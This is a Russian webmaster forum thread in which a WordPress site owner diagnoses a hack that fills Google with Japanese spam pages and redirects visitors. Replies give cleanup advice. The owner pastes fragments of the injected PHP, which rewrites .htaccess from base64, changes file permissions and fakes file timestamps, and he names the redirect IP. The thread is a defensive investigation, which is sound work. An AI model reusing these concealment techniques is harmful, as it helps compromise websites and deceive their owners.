- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Все что нужно знать о DDоS-атаках грамотному менеджеру
И как реагировать на "пожар", когда неизвестно, где хранятся "огнетушители
Антон Никонов
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Ситуация такая, в поиске гугла по запросу моего сайта site:l2-news.com в выдаче появились странные ссылки, ведущие на какую то японскую витрину товаров, они появились буквально недавно.
Соответственно проиндексированных страниц гугл стал показывать больше 17000, а было 748.
С выдачи гугла http://prntscr.com/8dy8yl появился 302 редирект , на сайт этой витрины http://prntscr.com/8dy9eq .
С главной страницы моего сайта редиректа нет, только с выдачи гугла.
Помогите разобраться, как это туда попало и что за зараза на сайте. ibolit`ом проверил, ничего не нашел хакерского.
Клоакинг видать, может htacces еще пофиксен, что там?
У WP много мест куда можно впихнуть редирект. Проверьте htaccess или index.php. Посмотрите php файлы которые недавно изменялись. Выгрузите бекап файлов и проверьте php на строку base64, eval.
Клоакинг видать, может htacces еще пофиксен, что там?
Все вроде норм, обычный по умолчанию htacces который делает wordpress никаких изменений
Как вариант, если вы не делали правок в ядро, просто поверх файлов перезалить свежескачанный вордпресс той же версии, которая стоит у вас. Сменить фтп пароль, в админку.
Гм, удалось словить 2 редиректа с главной - на сайт, продающий телефоны и на инет-шоп косметики.....
что интересно - больше редиректов поймать не удалось....
Возможно в бд залили ява-скрипт, который и вызывает редирект, потому и в скриптах ничего не находится.
Хотя, конечно, если тс сравнивал, не изменились ли скрипты отталкиваясь от даты, а не от содержимого - то он мог ничего не найти - дату изменения то можно поправить.
На хостинге в соседней папке где другой сайт нашел нормальный такой жирный кусок кода который что то пытается записать в htacces и index.php но как он может влиять на этот сайт
и дату файла рандомную ставить по формуле
Возможно там еще и веб-шелл есть, которым можно всеми сайтами рулить.
Все надо проверять, а если сайтов несколько - тем более...
в общем нашел на двух сайтах нормальный такой код, меняет доступ к файлам на 0664, меняет их и ставит им рандомную дату создания, так же записывается в файлы wp-*.php
$path = $dir . '/.htaccess';
$content = base64_decode('IyBCRUdJTiBXb3JkUHJlc3MKPElmTW9kdWxlIG1vZF9yZXdyaXRlLmM+ClJld3JpdGVFbmdpbmUgT24KUmV3cml0ZUJhc2UgLwpSZXdyaXRlUnVsZSBeaW5kZXhcLnBocCQgLSBbTF0KUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWYKUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWQKUmV3cml0ZVJ1bGUgLiAvaW5kZXgucGhwIFtMXQo8L0lmTW9kdWxlPgoKIyBFTkQgV29yZFByZXNzCg==');
if (file_exists($path) AND file_get_contents($path) != $content) {
chmod($path, 0644);
file_put_contents($path, $content);
chmod($path, 0444);
if (!$time) {
$time = my_time($dir);
}
touch($path, $time);
date = new Date(new Date().getTime() + 60*60*24*7*1000); document.cookie="' . $cookie_name . '=' . mt_rand(1, 1024) . '; path=/; expires="+date.toUTCString();
Затрудняюсь сказать из за этого у меня в гугле редиректы
---------- Добавлено 08.09.2015 в 17:20 ----------
не поленился декодировал все, вот и эроглифы и редиректы на http://93.171.205.64/blog/?bf4z&utm_source=24902:285846:482 и потом обратно меняет htacces после редиректа, как было
---------- Добавлено 08.09.2015 в 17:25 ----------
на галвном сайте упала посещаемость в 4 раза уже как два дня 😡
---------- Добавлено 08.09.2015 в 17:30 ----------
самая фигня у меня на сайте адсенс уже начал рекламу с иероглифами крутить, видно смотрит что в индексе 17000 страниц с японским товаром. Главный сайт вообще ушел в самый низ выдачи, там тоже какие то левые стараницы. В общем походу сайты похерил я, пол года трудов и денег. Ушел бухать.
---------- Добавлено 08.09.2015 в 17:33 ----------
кстати айболит эти кусrи кода не видит, хотя его алго я посмотрел вроде ищет по base64, теперь точно ушел.
Нужно искать дыру, через которую эта гадость попала на сайты.
Просто убрать - поможет наверняка только на время.
---------- Добавлено 09.09.2015 в 16:01 ----------
кстати айболит эти кусrи кода не видит, хотя его алго я посмотрел вроде ищет по base64, теперь точно ушел.
Надо ставить всегда на макс. чувствительность.
Нужно искать дыру, через которую эта гадость попала на сайты.
Просто убрать - поможет наверняка только на время.
---------- Добавлено 09.09.2015 в 16:01 ----------
Надо ставить всегда на макс. чувствительность.
Я выкачал весь каталог со всеми сайты с хостинга, прогнал доктор вебом такие страсти там нашел, что ппц.